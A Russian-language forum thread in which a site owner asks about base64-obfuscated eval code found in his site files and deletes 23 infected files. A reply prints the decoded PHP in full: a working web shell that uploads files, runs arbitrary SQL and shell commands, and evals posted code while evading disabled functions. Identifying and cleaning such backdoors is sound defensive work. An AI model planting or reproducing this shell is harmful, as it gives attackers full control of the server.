?eval(base64_decode

Статус
В этой теме нельзя размещать новые ответы.

sava36

Профессор
Регистрация
13 Мар 2007
Сообщения
154
Реакции
42
Ребята, помогите, кто силен в кодировке!
У меня на сайте. щас сканирую фтп и уже нашел с десяток файлов с этим кодом:

01.jpg

Что за код и как с ним бороться! я в замешательстве! Помогите кто знает что и как?
Сам код в приложении.
 

Вложения

  • intro.rar
    9,6 KB · Просмотры: 7
PHP:
if ($_POST["action"] == "upload") {

    $l=$_FILES["filepath"]["tmp_name"];
    $newpath=$_POST["newpath"];
    if ($newpath!="") move_uploaded_file($l,$newpath);
    echo "done";

} else if ($_POST["action"] == "sql") {

    $query = $_POST["query"];
    $query = str_replace("\'","'",$query);
    $lnk = mysql_connect($_POST["server"], $_POST["user"], $_POST["pass"]) or die ('Not connected : ' . mysql_error());
    mysql_select_db($_POST["db"], $lnk) or die ('Db failed: ' . mysql_error());
    mysql_query($query, $lnk) or die ('Invalid query: ' . mysql_error());
    mysql_close($lnk);
    echo "done<br><pre>$query</pre>";

} else if ($_POST["action"] == "runphp") {

    eval(base64_decode($_POST["cmd"]));

} else {

    $disablefunc = @ini_get("disable_functions");
    if (!empty($disablefunc)) {
        $disablefunc = str_replace(" ","",$disablefunc);
        $disablefunc = explode(",",$disablefunc);
    } else $disablefunc = array();

    function myshellexec($cmd) {
        global $disablefunc;
        $result = "";
        if (!empty($cmd)) {
            if (is_callable("exec") and !@in_array("exec",$disablefunc)) {@exec($cmd,$result); $result = @join("\n",$result);}
            elseif (($result = `$cmd`) !== FALSE) {}
            elseif (is_callable("system") and !@in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
            elseif (is_callable("passthru") and !@in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); @passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
            elseif (is_resource($fp = @popen($cmd,"r"))) {
                $result = "";
                while(!feof($fp)) {$result .= @fread($fp,1024);}
                @pclose($fp);
            }
        }
        return $result;
    }
    $cmd = $_POST["cmd"];
    echo "<form method=post>";
    echo "<input type=text name=cmd value='$cmd' size=150>";
    echo "<input type=submit name=B_SUBMIT value='Go'>";
    echo "</form>";
    if ($cmd != "") {
        echo "<pre>";
        $cmd=stripslashes($cmd);
        echo "Executing $cmd \n";
        echo myshellexec("$cmd");
        echo "</pre>";
        exit;
    }
}
Думаю этого тебе точно не надо )))
 
Так и сделал. удалил 23 файла. Ша пойду смотреть на "зеркало" на другом хосте, уже предвкушаю чистку и там!!!:smmne:
 
:bb: :bb: подсунули шелл
в base64 обычно никто ничего хорошего не пихает в скриптах
картинки в инстялляторах не в счет
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху